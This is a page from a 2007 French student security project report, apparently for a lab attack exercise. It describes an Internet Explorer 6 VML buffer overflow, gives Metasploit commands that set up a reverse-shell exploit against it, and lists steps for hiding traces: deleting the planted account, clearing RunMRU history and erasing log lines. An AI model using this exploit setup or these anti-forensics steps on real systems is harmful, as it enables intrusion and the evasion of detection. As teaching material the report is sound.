Objet du rapport / réunion - inetdoc.net
Objet du rapport / réunion - inetdoc.net
Objet du rapport / réunion - inetdoc.net
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
IUP STRI – M2 2007<br />
Projet Sécurité – Equipe attaque G1<br />
●<br />
●<br />
Supprimer le compte bidon si il existe<br />
Nettoyer l’historique de la commande exécuter<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMR<br />
U<br />
●<br />
Effacer les lignes intéressantes<br />
Exploit sur faille VML de IE<br />
La faille<br />
Description Technique<br />
Une vulnérabilité a été identifiée dans Microsoft Inter<strong>net</strong> Explorer, elle pourrait être exploitée<br />
par des attaquants distants afin de causer un déni de service ou afin de compromettre un<br />
système vulnérable. Ce problème résulte d'une erreur de type buffer overflow présente au<br />
niveau <strong>du</strong> traitement d'un document Vector Markup Language (VML) contenant un tag "rect"<br />
avec un attribut "fill" excessivement long, ce qui pourrait être exploité par des attaquants afin<br />
d'altérer le fonctionnement d'un navigateur vulnérable ou afin d'exécuter des commandes<br />
arbitraires en incitant un utilisateur à visiter une page web spécialement conçue.<br />
Versions Vulnérables<br />
Voici les versions vulnérables qui nous concernent :<br />
Microsoft Inter<strong>net</strong> Explorer 6 SP1 sous Microsoft Windows XP Service Pack 1<br />
Microsoft Inter<strong>net</strong> Explorer 6 pour Microsoft Windows XP Service Pack 2<br />
Microsoft Inter<strong>net</strong> Explorer 6 pour Microsoft Windows Server 2003<br />
Microsoft Inter<strong>net</strong> Explorer 6 pour Microsoft Windows Server 2003 Service Pack 1<br />
Configuration de l’exploit<br />
Il y a de grandes chances que les utilisateurs aient le droit de faire de l’HTTP et de l’HTTPS.<br />
msf ie_vml_rectfill(win32_reverse) > set HTTPHOST 172.16.48.14<br />
HTTPHOST -> 172.16.48.14<br />
msf ie_vml_rectfill(win32_reverse) > set HTTPPORT 80<br />
HTTPPORT -> 80<br />
msf ie_vml_rectfill(win32_reverse) > set LHOST 172.16.48.14<br />
LHOST -> 172.16.48.14<br />
msf ie_vml_rectfill(win32_reverse) > set LPORT 443<br />
LPORT -> 443<br />
Quelques tests avant l’attaque<br />
Afin de vérifier le fonctionnement, nous avons testé en local si l’exploit fonctionne<br />
correctement :<br />
msf ie_vml_rectfill(win32_reverse) > exploit<br />
[*] Starting Reverse Handler.<br />
. Copyright (c) 2007 – GNU Free Documentation licence Équipe Attaque G1 – M2 STRI 50